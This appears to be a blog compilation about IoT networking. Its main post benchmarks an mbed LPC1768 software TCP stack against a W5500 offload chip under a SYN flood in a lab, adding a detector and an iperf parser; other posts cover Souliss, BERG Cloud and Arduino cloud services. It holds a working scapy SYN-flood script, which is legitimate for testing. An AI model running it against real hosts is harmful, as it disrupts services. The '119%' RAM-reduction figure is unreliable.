Firewall for Internet of Things

Intro

**What is a firewall for IoT?**
– We will compare the traditional method and the proposed method under DoS Attack (SYN-flood attack).

IoT Platform: mbed NXP LPC1768

mbed LPC1768

It is based on the NXP LPC1768, with a 32-bit ARM Cortex-M3 core running at 96MHz. It includes 512KB FLASH, 32KB RAM and lots of interfaces including built-in Ethernet, USB Host and Device, CAN, SPI, I2C, ADC, DAC, PWM and other I/O interfaces. The pinout above shows the commonly used interfaces and their locations. Note that all the numbered pins (p5-p30) can also be used as DigitalIn and DigitalOut interfaces.
– Link1: For more detail

Traditional method: LwIP (TCP/IP software stack) + Ethernet MAC (LPC1768) + Ethernet PHY (DP83848J)@mbed application board (Ethernet connector)

mbed application board
Feature list:
* 128×32 Graphics LCD
* 5 way joystick
* 2 x Potentiometers
* 3.5mm Audio jack (Analog Out)
* Speaker, PWM connected
* 3 Axis ±1.5g Accelerometer
* 3.5mm Audio jack (Analog In)
* 2x Servo motor headers
* RGB LED, PWM connected
* USB-mini-B Connector
* Temperature sensor
* Socket for Xbee (Zigbee) or RN-XV (Wifi)
* RJ45 Ethernet Connector
* USB-A Connector
* 1.3mm DC Jack input

Proposed method: WIZ550io (TOE + Ethernet MAC + Ethernet PHY)

WIZ550io
– Link3: WIZ550io components in mbed.org
– Link4: W5500 components in mbed.org

Application for iperf

Recv-only code for the software stack

  • Based on the mbed echo-server example, modified to receive only.

#include "mbed.h"
#include "EthernetInterface.h"

EthernetInterface eth;

int main()
{
    printf("Trying\r\n");
    // Change the IP address, netmask and gateway to match your environment.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");

    if (!ret) {
        printf("Initialized, MAC: %s\n\r", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %s\n\r",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %d\n\r", ret);
        return -1;
    }

    eth.connect();
    printf("IP Address is %s\n", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("\nWait for new connection...\n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // receive() times out after 1.5 s

        printf("Connection from: %s\n", client.get_address());

        char buffer[2048];
        while (true) {
            // Receive only: data is read and discarded, nothing is echoed back.
            int n = client.receive(buffer, sizeof(buffer));
            if (n < 0) break; // timeout or client disconnected (!_is_connected)
        }
        client.close();
    }
}

Recv-only code for the TOE

#include <stdio.h>
#include <string.h>
#include "mbed.h"
#include "EthernetInterface.h"   // W5500 (WIZ550io) EthernetInterface library

//DigitalOut myled(LED1);
//Serial pc(USBTX , USBRX);

int main() {

    printf("Test - WIZ550io\r\n");

    SPI spi(p5, p6, p7); // mosi, miso, sclk

    /** Set the SPI bus clock frequency
     *
     *  @param hz SCLK frequency in Hz (default = 1 MHz)
     *  Maximum SPI data bit rate of 12.5 Mbit/s on the LPC176x
     */
    spi.frequency(12500000);

    EthernetInterface eth(&spi, p8, p11); // spi, cs, reset

    // Change the IP address, netmask and gateway to match your environment.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");
    if (!ret) {
        printf("Initialized, MAC: %s\n\r", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %s\n\r",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %d\n\r", ret);
        return -1;
    }

    printf("IP Address is %s\n", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("\nWait for new connection...\n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // receive() times out after 1.5 s

        printf("Connection from: %s\n", client.get_address());

        char buffer[2048];
        while (true) {
            // Receive only: data is read and discarded, nothing is echoed back.
            int n = client.receive(buffer, sizeof(buffer));
            if (n < 0) break; // timeout or client disconnected (!_is_connected)
        }
        client.close();
    }
}

Comparison of memory size

                   Software stack             TOE (W5500)
Code               [image: sw stack codes]    [image: TOE codes]
Memory usage       [image: sw memory usage]   [image: memory usage]

35.2kB (110%): The LPC1768 has 3 RAM banks: one general purpose bank of 32kB, and two additional ones of 16kB each for Ethernet/USB/CAN purposes. Ethernet completely fills one of those additional banks. The online compiler does take this into account for the total RAM usage, but assumes only 32kB is available, so it goes over the 100% it displays; it will still work fine though. (from mbed.org: http://developer.mbed.org/questions/3579/mbed-LPC-1768-RAM-Usage-128-what-does-th/)

**TOE can reduce the flash and RAM usage by 7% and 119% respectively.**

DoS Attack (Syn-flood attack)

We used scapy, a Python-based library, for the DoS attack.

from scapy.all import *

inter = float(input('inter (time in seconds to wait between 2 packets): '))

def synFlood(src, tgt, inter):
    IPlayer = IP(src=src, dst=tgt)
    TCPlayer = TCP(sport=3000, dport=3000) # change source and destination port to match your environment
    pkt = IPlayer / TCPlayer
    send(pkt, loop=1, inter=inter)

# send(pkts, inter=0, loop=0, verbose=None)
#   Send packets at layer 3, using the conf.L3socket supersocket. pkts can
#   be a packet, an implicit packet or a list of them.
#
#   loop: send the packets endlessly if not 0.
#   inter: time in seconds to wait between 2 packets
#   verbose: override the level of verbosity. Make the function totally silent when 0.
#   * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail.


# Change to the real IP addresses of your environment.
src = "192.168.77.253" # PC IP address
tgt = "192.168.77.34"  # target board (LPC1768)

synFlood(src, tgt, inter)
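As an added example (not part of the original post, and not the page's attack script), here is the defender's counterpart: a detector that watches the same traffic from the board's side, counts per source the SYNs that are never followed by an ACK inside a sliding window, and flags the source once the half-open count or the SYN rate crosses a threshold. The packet records are constructed inline; the target 192.168.77.34, the PC 192.168.77.253 and port 3000 are the values used above, while the legitimate client 192.168.77.10, the thresholds and the Pkt record type are assumptions.

```python
"""SYN-flood detector over per-packet records (defender's view).

Added example, not code from the original post. Per source address it
tracks the SYNs seen inside a sliding window and how many of them were
never followed by an ACK from the same source port, and flags the source
once the half-open count or the SYN rate exceeds a threshold. The packet
records below are constructed, not captured traffic: the board
192.168.77.34 and the PC 192.168.77.253 are the addresses used on this
page; the client 192.168.77.10 and the thresholds are assumptions.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float      # seconds
    src: str
    dst: str
    sport: int
    dport: int
    flags: str     # "S" = SYN, "SA" = SYN/ACK, "A" = ACK


class SynFloodDetector:
    def __init__(self, window_s=1.0, max_half_open=20, max_syn_rate=50.0):
        self.window_s = window_s
        self.max_half_open = max_half_open   # half-open attempts per source in the window
        self.max_syn_rate = max_syn_rate     # SYNs per second per source
        self._syns = defaultdict(deque)      # src -> deque of (ts, sport) inside the window
        self._acked = defaultdict(set)       # src -> source ports whose handshake completed
        self.alerts = {}                     # src -> (ts, half_open, rate), first alert only

    def _expire(self, src, now):
        q = self._syns[src]
        while q and now - q[0][0] > self.window_s:
            _, sport = q.popleft()
            # forget the completed mark only if no newer SYN from that port remains
            if all(sp != sport for _, sp in q):
                self._acked[src].discard(sport)

    def stats(self, src):
        """(half-open SYNs in window, SYNs per second) for one source."""
        q = self._syns[src]
        acked = self._acked[src]
        half_open = sum(1 for _, sp in q if sp not in acked)
        return half_open, len(q) / self.window_s

    def observe(self, pkt):
        """Feed one packet; return True if it raised an alert for its source."""
        if pkt.flags == "S":
            self._expire(pkt.src, pkt.ts)
            self._syns[pkt.src].append((pkt.ts, pkt.sport))
            self._acked[pkt.src].discard(pkt.sport)   # new attempt, not completed yet
        elif pkt.flags == "A":
            self._acked[pkt.src].add(pkt.sport)       # third handshake step from the client
        else:
            return False                              # SYN/ACK and data are not attempts
        half_open, rate = self.stats(pkt.src)
        if pkt.src not in self.alerts and (
                half_open > self.max_half_open or rate > self.max_syn_rate):
            self.alerts[pkt.src] = (pkt.ts, half_open, rate)
            return True
        return False


def constructed_traffic():
    """Constructed sample: one legitimate client completing its handshake, then
    100 bare SYNs from the PC address, 5 ms apart, all from source port 3000
    like the scapy script above."""
    pkts = [
        Pkt(0.00, "192.168.77.10", "192.168.77.34", 40001, 5000, "S"),
        Pkt(0.00, "192.168.77.34", "192.168.77.10", 5000, 40001, "SA"),
        Pkt(0.01, "192.168.77.10", "192.168.77.34", 40001, 5000, "A"),
    ]
    pkts += [Pkt(0.1 + i * 0.005, "192.168.77.253", "192.168.77.34", 3000, 3000, "S")
             for i in range(100)]
    return pkts


def run_detector(pkts, **thresholds):
    det = SynFloodDetector(**thresholds)
    for p in pkts:
        det.observe(p)
    return det


if __name__ == "__main__":
    d = run_detector(constructed_traffic())
    for src, (ts, half_open, rate) in d.alerts.items():
        print(f"ALERT t={ts:.3f}s src={src} half_open={half_open} syn_rate={rate:.0f}/s")
```

The half-open count is exactly the state a software stack such as lwIP must hold in RAM for every unfinished handshake, which is what the comparison on this page exercises; the same counter can be fed from the board's own accept loop or from a capture taken on the gateway.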

How to use iperf

Iperf is a tool to measure maximum TCP bandwidth, allowing the tuning of various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter and datagram loss.

# ex.) host IP (192.168.77.34), port 5000, display format Mbit/sec, report interval 1 sec.
>iperf.exe -c 192.168.77.34 -p 5000 -f m -i 1
  • -c : --client host, connect to the host specified.
  • -p : --port #, the server port to connect to (the port the server listens on).
  • -f : --format [kmKM], 'm' = Mbit/sec
  • -i : --interval #, the interval in seconds between periodic bandwidth reports.

[Figure: Throughput performance]

Network configuration

[Figure: Network configurations to measure performance]

Network performance

[Figure: Traditional method: lwIP performance according to SYN packet traffic (SW bandwidth)]

[Figure: Proposed method: TOE (W5500) performance according to SYN packet traffic (TOE (W5500) bandwidth)]

**The network performance of the traditional method is better than that of the proposed method when the DoS attack is weak, because the traditional method uses the bus interface for the MAC (the proposed method does not use SPI DMA). However, the proposed method kept up its network performance under the SYN-flood attack, whereas the network performance of the traditional method became extremely worse depending on the interval of the SYN attack.**
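To turn the iperf runs from the "How to use iperf" section into the comparison above, here is an added example (not code from the original post) that parses iperf 2 client output, keeps the final whole-run summary line apart, and reports how much of the baseline bandwidth survived a run taken while the SYN flood was active. The two outputs embedded in the block are constructed in iperf's line format rather than captured from the board, and the parser also accepts the K/G unit variants beyond the page's -f m.

```python
"""Parse iperf 2 client output and quantify throughput loss under attack.

Added example, not code from the original post. It parses the per-interval
lines printed by `iperf -c 192.168.77.34 -p 5000 -f m -i 1`, separates the
closing whole-run summary line, and compares a baseline run with a run taken
while the SYN flood was active. Both outputs below are constructed in
iperf's line format, not measurements from the board; bandwidth units other
than Mbits/sec are also accepted (beyond the page's `-f m`).
"""
import re
from statistics import mean

# e.g. "[  3]  0.0- 1.0 sec  1.25 MBytes  10.0 Mbits/sec"
_ROW = re.compile(
    r"^\[\s*\d+\]\s+(?P<start>[\d.]+)-\s*(?P<end>[\d.]+)\s+sec\s+"
    r"[\d.]+\s+\w+\s+(?P<bw>[\d.]+)\s+(?P<unit>[KMG]?bits)/sec"
)
_TO_MBITS = {"bits": 1e-6, "Kbits": 1e-3, "Mbits": 1.0, "Gbits": 1e3}


def parse_iperf(text):
    """Return (intervals, summary): entries are (start_s, end_s, mbits_per_sec).
    The summary is the closing line that starts at 0.0 and spans the whole run,
    or None if iperf was interrupted before printing it."""
    intervals, summary = [], None
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        start, end = float(m["start"]), float(m["end"])
        mbits = float(m["bw"]) * _TO_MBITS[m["unit"]]
        row = (start, end, mbits)
        # The summary repeats start 0.0 but spans more than one report interval.
        if start == 0.0 and intervals and end > intervals[0][1]:
            summary = row
        else:
            intervals.append(row)
    return intervals, summary


def summarize(intervals):
    """Mean and minimum interval bandwidth (Mbits/sec) and the number of
    intervals in which nothing got through at all."""
    bws = [bw for _, _, bw in intervals]
    return {"mean": mean(bws), "min": min(bws),
            "stalled": sum(1 for bw in bws if bw == 0.0)}


def throughput_retained(baseline, attacked):
    """Fraction of the baseline mean bandwidth kept during the attacked run."""
    return summarize(attacked)["mean"] / summarize(baseline)["mean"]


# Constructed sample outputs in the iperf 2 line format (not real measurements).
BASELINE = """\
------------------------------------------------------------
Client connecting to 192.168.77.34, TCP port 5000
TCP window size: 64.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.77.253 port 49152 connected with 192.168.77.34 port 5000
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0- 1.0 sec  1.25 MBytes  10.0 Mbits/sec
[  3]  1.0- 2.0 sec  1.25 MBytes  10.0 Mbits/sec
[  3]  2.0- 3.0 sec  1.12 MBytes  9.00 Mbits/sec
[  3]  3.0- 4.0 sec  1.38 MBytes  11.0 Mbits/sec
[  3]  4.0- 5.0 sec  1.25 MBytes  10.0 Mbits/sec
[  3]  0.0- 5.0 sec  6.25 MBytes  10.0 Mbits/sec
"""

UNDER_ATTACK = """\
[  3] local 192.168.77.253 port 49153 connected with 192.168.77.34 port 5000
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0- 1.0 sec  1.25 MBytes  10.0 Mbits/sec
[  3]  1.0- 2.0 sec  0.50 MBytes  4.00 Mbits/sec
[  3]  2.0- 3.0 sec  0.25 MBytes  2.00 Mbits/sec
[  3]  3.0- 4.0 sec  0.00 MBytes  0.00 Mbits/sec
[  3]  4.0- 5.0 sec  0.00 MBytes  0.00 Mbits/sec
[  3]  0.0- 5.0 sec  2.00 MBytes  3.20 Mbits/sec
"""


if __name__ == "__main__":
    base, base_sum = parse_iperf(BASELINE)
    atk, atk_sum = parse_iperf(UNDER_ATTACK)
    print("baseline     :", summarize(base), "summary:", base_sum)
    print("under attack :", summarize(atk), "summary:", atk_sum)
    print(f"throughput retained: {throughput_retained(base, atk):.0%}")
```

Run one capture of iperf per attack interval against each board and feed the outputs to `throughput_retained`; the per-interval "stalled" count shows where the software stack stopped serving altogether, which a single summary line hides.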

souliss

Distributed Framework for Home Automation and Internet of Things

What’s Souliss?

It is an open source framework that runs over multiple platforms and across different physical layers, such as WiFi, wireless and Ethernet.

Souliss can not only control and monitor your networked objects, but also share data and trigger actions from the shared data.

Platform for Souliss

  • Supported hardware platforms
    • Arduino Boards
    • KMTronic DINo
    • Olimex AVR / OLIMEXINO boards
    • AirQ Network Boards
  • Transceivers
    • AT86RF230
    • Nordic nRF24L01 and RF24L01+
    • WIZnet W5100 / W5200 / W5500
    • Microchip ENC28J60

Souliss’s Materials

https://code.google.com/p/souliss/

BERG Cloud

Berg: cloud services for hardware innovators.

[Figure: Berg overview]

There are many web services for hardware currently. BERG is one of them and already has a small ecosystem that includes Little Printer, Cloudwash, #Flock and Pixel Track.

  • Little Printer
  • Cloudwash
  • #Flock
  • Pixel Track

API

Berg provides the device API for hardware innovators and makers and the cloud API for web managers. The V2 API is the current one.

[Figure: devcenter overview]

List of cloud service applications for open hardware

There are many cloud-based service platforms for the Internet of Things.
The platform combining "Arduino + Ethernet shield" is chosen as their reference end-node device, so I compiled a list of the cloud platforms that use the Ethernet shield for their device.

#Cloud services are no longer the exclusive domain of smart devices, typified by the smartphone; they have become a central topic of #IoT.

Beyond the #Visualization that Xively first showed, the functionality is now expanding to #Log, #Trigger and #Alert.

Put simply, the cloud server receives the data sent by the IoT device, stores it (log), compares it against a configured threshold (trigger) and, through an SNS such as Twitter, sends the individual a message (alert). In short, the boundaries between IoT, SNS and cloud are blurring.

The cloud service providers listed below are those that accept the Arduino platform as an IoT device with Ethernet or WiFi. The providers below probably support other links too, and if you include providers supporting 3G/BLE/Zigbee and so on there are many more.

I looked at the blogs, GitHub repositories, websites and forums of the providers that applied an Ethernet shield on Arduino, the most approachable open hardware platform.

Having listed them, I should also look at the element technologies an IoT node for a cloud service needs (RESTful, CoAP, MQTT, IFHTTP, PHTTP…).

  • Carriots (Ethernet Shield)
    • Blog: http://yczhu.org/author/zyc262626/
    • Carriots Forum: http://forum.carriots.com/index.php/topic/4-arduino-connection-to-carriots/
  • Adafruit CC3000 (WiFi; the explanation is detailed)
    • Adafruit Learn: https://learn.adafruit.com/wireless-gardening-arduino-cc3000-wifi-modules/introduction
  • Nimbits (Ethernet Shield)
    • Nimbits Blog: http://nimbits.blogspot.kr/2010/11/data-in-connect-arduino-to-cloud.html
    • Nimbits GitHub: https://github.com/bsautner/com.nimbits/blob/master/samples/arduino/NimbitsClient/examples/SocketExample/SocketExample.ino
  • evrythng (www.evrythng.com/) (WIZ550io)
    • mbed.org: https://developer.mbed.org/teams/EthernetInterfaceW5500-makers/code/EvrythngApiExampleW5500/
  • grovestreams (www.grovestreams.com) (Ethernet Shield)
    • Grovestreams web: https://grovestreams.com/developers/getting_started_arduino_temp.html
  • Lelylan (http://www.lelylan.com/) (Ethernet Shield)
    • GitHub: https://gist.github.com/andreareginato/6725485
  • Exosite (Ethernet Shield)
    • Arduino.cc: http://playground.arduino.cc/Code/Exosite
  • Axeda (Ethernet Shield: SEEED Ethernet Shield v1.0 or v2.0)
    • Axeda web: http://developer.axeda.com/Instructions/axeda-go-kit-arduino-Mega-2560
  • Xively (Ethernet Shield)
    • GitHub: https://github.com/xively/xively_arduino
  • IBM Bluemix (Ethernet Shield)
    • IBM web: http://www.ibm.com/developerworks/cloud/library/cl-bluemix-arduino-iot2/index.html
  • Temboo (Ethernet Shield)
    • Temboo: https://www.temboo.com/arduino/others/getting-started
    • embeddist: https://embeddist.wordpress.com/2014/10/15/arduino-with-temboo/

Telefónica launches Lego-like blocks for the Internet of Things

A video that nicely shows the recent trend of IoT! There are many trends in #IoT, but the #Cloud-friendly one attracts me most. The service is easy to understand too.

Atmel | Bits & Pieces

Telefónica has launched what it describes as the first Internet of Things (IoT) product enabling consumers to connect just about any device wirelessly to the web. The new product, dubbed ‘Thinking Things,’ is a simple plug-and-play solution based on Lego-like modules with 2G connectivity that allow Makers to develop their own smart solutions without any programming know-how or having to install an additional infrastructure.

The first Thinking Things pack to be marketed by the company is an ambient kit pack, a set of modules that enables users to remotely monitor in real-time the temperature, humidity and light intensity of a given place, and to program automated tasks. According to the company, an additional host of modules such as presence, pressure, humidity and temperature sensors, impact meters, audio and LED notifications, and timers can be added as well.

Telefónica specified that the modules can be pieced together by simply fitting them on top…
